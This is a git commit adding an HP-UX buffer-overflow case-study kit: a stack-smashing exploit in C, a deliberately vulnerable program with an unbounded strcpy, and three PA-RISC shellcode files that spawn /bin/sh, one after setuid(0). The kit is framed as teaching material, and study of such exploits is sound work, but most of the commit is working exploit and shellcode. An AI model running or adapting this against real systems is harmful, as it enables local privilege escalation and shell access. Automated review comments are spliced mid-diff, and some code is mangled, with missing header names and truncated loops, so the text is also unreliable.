From c9cbeced5b3f2bdd7407e29c0811e65954132540 Mon Sep 17 00:00:00 2001
From: Root THC
Date: Tue, 24 Feb 2026 12:42:47 +0000
Subject: initial
---
 other/shellkit/tmp/hpux-tools.tar.gz | Bin 0 -> 2550 bytes
 other/shellkit/tmp/hpux-tools/Makefile | 5 +
 other/shellkit/tmp/hpux-tools/README | 10 ++
 other/shellkit/tmp/hpux-tools/sample-one/Makefile | 10 ++
 other/shellkit/tmp/hpux-tools/sample-one/README | 5 +
 other/shellkit/tmp/hpux-tools/sample-one/exploit.c | 123 +++++++++++++++++++++
 other/shellkit/tmp/hpux-tools/sample-one/vuln.c | 34 ++++++
 other/shellkit/tmp/hpux-tools/shell-one.s | 39 +++++++
 other/shellkit/tmp/hpux-tools/shell-tree.s | 31 ++++++
 other/shellkit/tmp/hpux-tools/shell-two.s | 41 +++++++
 other/shellkit/tmp/hpux_bof.pdf | Bin 0 -> 243787 bytes
 11 files changed, 298 insertions(+)
 create mode 100644 other/shellkit/tmp/hpux-tools.tar.gz
 create mode 100644 other/shellkit/tmp/hpux-tools/Makefile
 create mode 100644 other/shellkit/tmp/hpux-tools/README
 create mode 100644 other/shellkit/tmp/hpux-tools/sample-one/Makefile
 create mode 100644 other/shellkit/tmp/hpux-tools/sample-one/README
 create mode 100644 other/shellkit/tmp/hpux-tools/sample-one/exploit.c
 create mode 100644 other/shellkit/tmp/hpux-tools/sample-one/vuln.c
 create mode 100644 other/shellkit/tmp/hpux-tools/shell-one.s
 create mode 100644 other/shellkit/tmp/hpux-tools/shell-tree.s
 create mode 100644 other/shellkit/tmp/hpux-tools/shell-two.s
 create mode 100644 other/shellkit/tmp/hpux_bof.pdf
(limited to 'other/shellkit/tmp')
diff --git a/other/shellkit/tmp/hpux-tools.tar.gz b/other/shellkit/tmp/hpux-tools.tar.gz
new file mode 100644
index 0000000..6fa3a5e
Binary files /dev/null and b/other/shellkit/tmp/hpux-tools.tar.gz differ
diff --git a/other/shellkit/tmp/hpux-tools/Makefile b/other/shellkit/tmp/hpux-tools/Makefile
new file mode 100644
index 0000000..19e8fd4
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/Makefile
@@ -0,0 +1,5 @@
+all: sample-one shell-one shell-two shell-tree
+
+
+sample-one:
+ @cd sample-one && make
diff --git a/other/shellkit/tmp/hpux-tools/README b/other/shellkit/tmp/hpux-tools/README
new file mode 100644
index 0000000..b6ee0df
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/README
@@ -0,0 +1,10 @@
+This archive contains following files:
+Makefile - make file to build the stuff
+sample-one - example of exploit and vulnerable program
+shell-one.s - shellcode (v1)
+shell-tree.s - shellcode (v2)
+shell-two.s - shellcode (v3)
+
+
+--
+fygrave@tigerteam.net
diff --git a/other/shellkit/tmp/hpux-tools/sample-one/Makefile b/other/shellkit/tmp/hpux-tools/sample-one/Makefile
new file mode 100644
index 0000000..aea8390
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/sample-one/Makefile
@@ -0,0 +1,10 @@
+all: exploit vuln
+
+exploit: exploit.c
+ gcc exploit.c -o exploit
+vuln: vuln.c
+ gcc vuln.c -o vuln
+
+
+clean:
+ @rm -f core *.core *.o vuln exploit a.out
diff --git a/other/shellkit/tmp/hpux-tools/sample-one/README b/other/shellkit/tmp/hpux-tools/sample-one/README
new file mode 100644
index 0000000..66be971
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/sample-one/README
@@ -0,0 +1,5 @@
+These are examples for HP-UX buffer overflow case study. For more information
+please see http://www.notlsd.net/bof/
+
+--
+fygrave@tigerteam.net Tue Mar 20 15:41:48 ICT 2001
diff --git a/other/shellkit/tmp/hpux-tools/sample-one/exploit.c b/other/shellkit/tmp/hpux-tools/sample-one/exploit.c
new file mode 100644
index 0000000..11dc23c
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/sample-one/exploit.c
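Review bot: The `sample-one` target in the top-level Makefile has no prerequisites and names a directory that the diffstat shows already exists (`sample-one/Makefile` is part of this commit), so make considers it up to date and never runs its recipe; it needs `.PHONY: all sample-one` to descend into the subdirectory at all. The recipe also calls `make` directly, so `-j`, `-n` and command-line variables from the parent invocation are not passed on; `@cd sample-one && $(MAKE)` is the recursion form make expects. The same missing `.PHONY` applies to `all` and `clean` in `sample-one/Makefile` in the later hunk, where a stray file named `clean` would silently disable the rule. `all` further lists `shell-one`, `shell-two` and `shell-tree` with no rule of their own, which presumably relies on make's built-in `.s` rules on the host; a comment stating that would make the intent visible.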
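Review bot: The `exploit` and `vuln` rules in `sample-one/Makefile` hard-code `gcc` with no warning or standard flags, so neither the compiler nor diagnostics can be chosen without editing the file; `$(CC) $(CFLAGS) vuln.c -o vuln` (and the same for `exploit`) with a `CFLAGS ?= -Wall -Wextra` line at the top keeps the current default behaviour while letting the host supply its toolchain. For a case-study program whose point is a memory-safety defect, building with warnings enabled is also the first thing a reader will want, since it shows which of the sample's constructs the compiler already flags.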
@@ -0,0 +1,123 @@ +/* + * Sample exploit for HP-UX buffer overflows case study + */ +#include +#include + + +char shellcode[]= +"\xe8\x3f\x1f\xfd\xb4\x23\x03\xe8\x60\x60\x3c\x61\x0b\x39\x02" +"\x99\x34\x1a\x3c\x53\x0b\x43\x06\x1a\x20\x20\x08\x01\x34\x16\x03" +"\xe8\xe4\x20\xe0\x08\x96\xd6\x03\xfe/bin/shA"; + +#define BUFFER_SIZE 180 +#define STACK_DSO -84 +#define NOP 0x0b390280 +#define PAD 0 +#define ALIGN 8 +#define ADB_PATH "/usr/bin/adb" +#define VULNVAR "VULNBUF=" +#define MORE 1 + + +unsigned long get_sp(void) +{ + __asm__("copy %sp,%ret0 \n"); +} + +int main(int argc, char **argv) { +int i, dso, align, padd, buf_size, adb, more; +char *buf, *ptr; +unsigned long retaddr; + + +dso = STACK_DSO; +align = ALIGN; +padd = PAD; +buf_size = BUFFER_SIZE; +retaddr = 0; +more = MORE; + + + + +while ((i = getopt(argc, argv, + "Dd:b:r:o:a:p:m:")) != EOF) { + switch (i) { + case 'd': + dso=(int) strtol(optarg, NULL, 0); + break; + case 'm': + more+=(int) strtol(optarg, NULL, 0); + break; + case 'b': + buf_size=(int)strtol(optarg, NULL, 0); + break; + case 'r': + retaddr = strtoul(optarg, NULL, 0); + break; + case 'a': + align = (int) strtol(optarg, NULL, 0); + break; + case 'p': + padd = (int) strtol(optarg, NULL, 0); + break; + case 'D': + adb = 1; + break; + default: + fprintf(stderr, "usage: %s [-b buffer_size] [-d dso] " + "[-r return_address]" + "[-a align] [-p pad] [-D] [-m more_rets]\n", argv[0]); + exit(1); + break; + } +} + + +buf=(char *)calloc(strlen(VULNVAR) + buf_size + + sizeof(unsigned long)*more + 1, 1); +ptr=buf; +if (!buf) { + perror("calloc"); + exit(1); +} + +fprintf(stderr,"our stack %X\n",get_sp()); +if (!retaddr) + retaddr=get_sp()- dso + 3; +fprintf(stderr, "Using: ret: 0x%X pad: %i align: %i" + " buf_len: %i dso: %i more: %i\n", + retaddr, padd, align, buf_size, dso, more); + +strcpy(buf, VULNVAR); +ptr+=strlen(VULNVAR); +for(i=0;i>24)&0xff; + *ptr++=(NOP>>16)&0xff; + *ptr++=(NOP>>8)&0xff; + *ptr++=(NOP)&0xff; +} + +strcat(buf, shellcode); // 
append shellcode +ptr+=strlen(shellcode); + +for(i=0;i>24)&0xff; + *ptr++=(retaddr>>16)&0xff; + *ptr++=(retaddr>>8)&0xff; + *ptr++=(retaddr)&0xff; +} +fprintf(stderr,"buflen is %i\n", strlen(buf)); +putenv(buf,1); +if (adb) + execl(ADB_PATH,"adb","vuln", NULL); +else + execl("./vuln","vuln",buf, NULL); +perror("execl"); +return 0; // uff +} diff --git a/other/shellkit/tmp/hpux-tools/sample-one/vuln.c b/other/shellkit/tmp/hpux-tools/sample-one/vuln.c new file mode 100644 index 0000000..698af76 --- /dev/null +++ b/other/shellkit/tmp/hpux-tools/sample-one/vuln.c @@ -0,0 +1,34 @@ +/* + * Sample vulnerable program for HP-UX buffer overflows case study + */ +#include +#include + + +unsigned long get_sp(void) +{ + __asm__("copy %sp,%ret0 \n"); +} + +void baz(char *argument) { + char badbuf[200]; + + printf("badbuf ptr is: %p\n",badbuf); + strcpy(badbuf,argument); +} + +void foo(char *arg) { + + baz(arg); + +} + +int main(int argc, char **argv) { +char *param; + +printf("vuln stack is: 0x%X\n",get_sp()); +param=getenv("VULNBUF"); +foo(param); + +return 0; +} diff --git a/other/shellkit/tmp/hpux-tools/shell-one.s b/other/shellkit/tmp/hpux-tools/shell-one.s new file mode 100644 index 0000000..afbf9f8 --- /dev/null +++ b/other/shellkit/tmp/hpux-tools/shell-one.s 
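Review bot: `main` in vuln.c passes the result of `getenv("VULNBUF")` straight to `foo`/`baz` without a NULL check, so running the sample with the variable unset reaches `strcpy(badbuf, argument)` with a NULL source, which is undefined behaviour and crashes for a reason unrelated to the overflow the case study is about; a guard such as `if (!param) { fprintf(stderr, "VULNBUF not set\n"); return 1; }` keeps the intentional defect while making the unset case fail clearly. Since the unbounded `strcpy` into `badbuf[200]` is the deliberate bug, a comment on that line marking it as the demonstrated overflow and naming the bounded form a fixed build would use, `snprintf(badbuf, sizeof badbuf, "%s", argument);`, would help readers separate the lesson from the scaffolding. The `printf("vuln stack is: 0x%X\n", get_sp())` line passes an `unsigned long` to `%X`, which expects `unsigned int`; `%lX` matches the type. The `#include` directives in this hunk appear to have lost their header names in this rendering, so which headers declare `strcpy`/`getenv` here cannot be confirmed from the page.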
@@ -0,0 +1,39 @@ + .SPACE $TEXT$ + .SUBSPA $CODE$,QUAD=0,ALIGN=8,ACCESS=44 + + .align 4 + .EXPORT main,ENTRY,PRIV_LEV=3,ARGW0=GR,ARGW1=GR +main + + bl shellcode, %r1 + nop + .SUBSPA $DATA$ + .EXPORT shellcode; So we could see it in debugger +shellcode + xor %r26, %r26, %r26; 0 - argv0 + ldil L%0xc0000000,%r1; entry point + ble 0x4(%sr7,%r1) ; + ldi 23, %r22 + +jump + bl .+8,%r1 ; address into %r1 + nop + stb %r0, SHELL-jump+7-11(%sr0,%r1) + + xor %r25, %r25, %r25; NULL ->arg1 + ldi SHELL-jump-11, %r26; + add %r1, %r26, %r26; + + ldil L%0xc0000000,%r1; entry point + ble 0x4(%sr7,%r1) ; + ldi 11, %r22; + + xor %r26, %r26, %r26; return 0 + ldil L%0xc0000000,%r1; entry point + ble 0x4(%sr7,%r1) ; + ldi 1, %r22 ; exit + +SHELL + .STRING "/bin/shA"; + +endofshellcode diff --git a/other/shellkit/tmp/hpux-tools/shell-tree.s b/other/shellkit/tmp/hpux-tools/shell-tree.s new file mode 100644 index 0000000..c3044da --- /dev/null +++ b/other/shellkit/tmp/hpux-tools/shell-tree.s @@ -0,0 +1,31 @@ + .SPACE $TEXT$ + .SUBSPA $CODE$,QUAD=0,ALIGN=8,ACCESS=44 + + .align 4 + .EXPORT main,ENTRY,PRIV_LEV=3,ARGW0=GR,ARGW1=GR +main + + bl shellcode, %r1 + nop + .SUBSPA $DATA$ + .EXPORT shellcode; So we could see it in debugger +shellcode + + bl .+4,%r1 ; address into %r1 + addi 500, %r1, %r3; + stb %r0, SHELL-shellcode+7-11-500(%sr0,%r3) + + xor %r25, %r25, %r25; NULL ->arg1 + ldi SHELL-shellcode-11-500, %r26; + add %r3, %r26, %r26; + + ldil L%0xc0000000,%r1; entry point + ldi 500, %r22 ; + ble 0x4(%sr7,%r1) ; + subi 511, %r22, %r22 ; + + +SHELL + .STRING "/bin/shA"; + +endofshellcode diff --git a/other/shellkit/tmp/hpux-tools/shell-two.s b/other/shellkit/tmp/hpux-tools/shell-two.s new file mode 100644 index 0000000..5dac10f --- /dev/null +++ b/other/shellkit/tmp/hpux-tools/shell-two.s 
@@ -0,0 +1,41 @@ + .SPACE $TEXT$ + .SUBSPA $CODE$,QUAD=0,ALIGN=8,ACCESS=44 + + .align 4 + .EXPORT main,ENTRY,PRIV_LEV=3,ARGW0=GR,ARGW1=GR +main + + bl shellcode, %r1 + nop + .SUBSPA $DATA$ + .EXPORT shellcode; So we could see it in debugger +shellcode + xor %r26, %r26, %r26; 0 - argv0 + ldil L%0xc0000000,%r1; entry point + ldi 500, %r22 ; + ble 0x4(%sr7,%r1) ; + subi 523, %r22, %r22 ; setuid(0) +jump + bl .+4,%r1 ; address into %r1 + addi 500, %r1, %r3; + stb %r0, SHELL-jump+7-11-500(%sr0,%r3) + + xor %r25, %r25, %r25; NULL ->arg1 + ldi SHELL-jump-11-500, %r26; + add %r3, %r26, %r26; + + ldil L%0xc0000000,%r1; entry point + ldi 500, %r22 ; + ble 0x4(%sr7,%r1) ; + subi 511, %r22, %r22 ; + + xor %r26, %r26, %r26; return 0 + ldil L%0xc0000000,%r1; entry point + ldi 500, %r22 ; + ble 0x4(%sr7,%r1) ; + subi 501, %r22, %r22 ; exit + +SHELL + .STRING "/bin/shA"; + +endofshellcode diff --git a/other/shellkit/tmp/hpux_bof.pdf b/other/shellkit/tmp/hpux_bof.pdf new file mode 100644 index 0000000..6d2a957 Binary files /dev/null and b/other/shellkit/tmp/hpux_bof.pdf differ -- cgit v1.3